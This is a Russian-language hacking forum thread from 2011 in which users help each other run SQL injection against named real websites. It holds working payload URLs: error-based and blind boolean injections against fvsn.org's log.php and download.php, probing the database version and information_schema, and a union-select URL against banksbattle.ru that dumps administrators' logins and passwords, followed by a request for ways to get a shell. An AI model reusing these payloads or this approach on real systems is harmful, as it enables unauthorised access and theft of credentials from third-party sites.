 |
|
07.10.2011, 15:34
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от Mr.aids
запрос вида
log.php?ver=1.0.1.130'
Ошибка при занесении информации в базу.
118 ******/log.php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1.0.1.130'', '' )' at line 25
INSERT INTO log (event, os, client, ie, fr, op, ch, guid, ip, ver, msg ) VALUES ( '', '', '', '', '', '', '', '', '127.0.0.1', '1.0.1.130'', '' ) array(1) { ["ver"]=> string(10) "1.0.1.130'" }
все параметры строковые, можно как то вставить union+select?
/showpost.php?p=2582303&postcount=16413
Выше на несколько постов Expl0ited'ом на живом примере приведен аналогичный способ проведения инъекции с выводом в ошибку Duplicate Entry, разве что только там режется пробел.
|
|
|
07.10.2011, 22:35
|
|
Новичок
Регистрация: 19.02.2011
Сообщений: 10
С нами:
8014646
Репутация:
0
|
|
http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3& fr=test4&op=test5&ch=test6&guid=test7&ip=test8&ver =test9&msg=test10
и эта не работает
http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3& fr=test4&op=test5&ch=test6&guid=test7',(SELECT%201 ),'a1','a2')--%20-&ip=test8&ver=test9&msg=test10
слепая скуль, что то делаю не так (перебираю a-z)
http://fvsn.org/download.php?id=18296%20and%20lower('a')=lower(sub string((SELECT%20os%20FROM%20log),1,1))
подскажите чего нибудь
|
|
|
|
07.10.2011, 23:22
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от Mr.aids
http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3& fr=test4&op=test5&ch=test6&guid=test7&ip=test8&ver =test9&msg=test10
и эта не работает
http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3& fr=test4&op=test5&ch=test6&guid=test7',(SELECT%201 ),'a1','a2')--%20-&ip=test8&ver=test9&msg=test10
слепая скуль, что то делаю не так (перебираю a-z)
http://fvsn.org/download.php?id=18296%20and%20lower('a')=lower(sub string((SELECT%20os%20FROM%20log),1,1))
подскажите чего нибудь
1 - просто вывод того, что передали параметром.
2.
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr(vers ion(),1,1))>0,1,0))
меняешь >0 и подбираешь код символа. через char() можешь получить его значение.
|
|
|
|
08.10.2011, 13:30
|
|
Новичок
Регистрация: 19.02.2011
Сообщений: 10
С нами:
8014646
Репутация:
0
|
|
Сообщение от Melfis
1 - просто вывод того, что передали параметром.
2.
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr(vers ion(),1,1))>0,1,0))
меняешь >0 и подбираешь код символа. через char() можешь получить его значение.
кстати ascii не работает
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(lower(subst r('1',1,1)))=31,1,0))
|
|
|
|
08.10.2011, 13:34
|
|
Новичок
Регистрация: 19.02.2011
Сообщений: 10
С нами:
8014646
Репутация:
0
|
|
http://fvsn.org/download.php?id=(18296)and+1=(if(lower(substr(vers ion(),1,1))='5',1,0))
вот так фурычит
|
|
|
|
08.10.2011, 13:58
|
|
Новичок
Регистрация: 19.02.2011
Сообщений: 10
С нами:
8014646
Репутация:
0
|
|
только вот не понятно как с SELECT запрос сделать, там тоже чтото фильтруется
|
|
|
|
08.10.2011, 14:12
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от Mr.aids
только вот не понятно как с SELECT запрос сделать, там тоже чтото фильтруется
что не так?
Код:
http://fvsn.org/download.php?id=(18296)and(1)=if(mid((select(version())),1,1)=5,1,0)
|
|
|
|
08.10.2011, 14:18
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Код:
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr((select count(table_name) from information_schema.tables),1,1))=49,1,0))
Тут тоже не фильтруется. |
|
|
|
08.10.2011, 15:45
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
такая ситуация:
обычная скуль..ничего не фильтруется, трудностей не возникло вообще до получения login;pass админа. Хочу получить шелл, НО:
1. Не могу найти панель администратора. Такое впечатление, что на самом сайте ее вообще нет.
2. Нет прав у текущего юзверя под которым работает БД на то чтобы залить шелл средствами с ку эль.
Есть какие еще варианты получения шелла?
Чтобы не быть голословным привожу линк
http://banksbattle.ru/333.php?archiv=-59+union+select+1,concat(login,0x20,password),3,4, 5,6+from+admins--
жду ваших предложений=)
|
|
|
|
08.10.2011, 18:26
|
|
Новичок
Регистрация: 19.02.2011
Сообщений: 10
С нами:
8014646
Репутация:
0
|
|
Сообщение от Melfis
Код:
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr((select count(table_name) from information_schema.tables),1,1))=49,1,0))
Тут тоже не фильтруется. блин у меня сейчас голова взарвётся. как так это работает.
ведь это не работает
http://fvsn.org/download.php?id=(18296)and%20ascii('1')=31
, а в ней ascii
я сейчас сума сойду, как в первом выражении ascii прошло, а в моём не проходит, объясните пожалуйста?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
